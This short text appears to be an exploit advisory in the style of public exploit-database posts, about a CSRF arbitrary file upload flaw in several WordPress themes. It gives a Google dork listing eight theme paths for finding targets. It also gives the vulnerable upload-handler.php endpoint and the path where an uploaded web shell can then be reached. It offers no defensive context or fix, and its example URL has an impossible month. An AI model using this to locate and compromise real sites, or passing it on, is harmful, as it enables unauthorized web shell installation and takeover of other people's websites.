Dork :
inurl:"/wp-content/themes/agritourismo-theme/" inurl:"/wp-content/themes/bordeaux-theme/" inurl:"/wp-content/themes/bulteno-theme/" inurl:"/wp-content/themes/oxygen-theme/" inurl:"/wp-content/themes/radial-theme/" inurl:"/wp-content/themes/rayoflight-theme/" inurl:"/wp-content/themes/reganto-theme/" inurl:"/wp-content/themes/rockstar-theme/"
CSRF File Upload Vulnerability
Exploit & POC :
http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php
File Access :
http://vitcim/wp-content/uploads/[years]/[month]/your_shell.php
Example :
http://127.0.0.1/wp-content/uploads/2013/13/noxs.php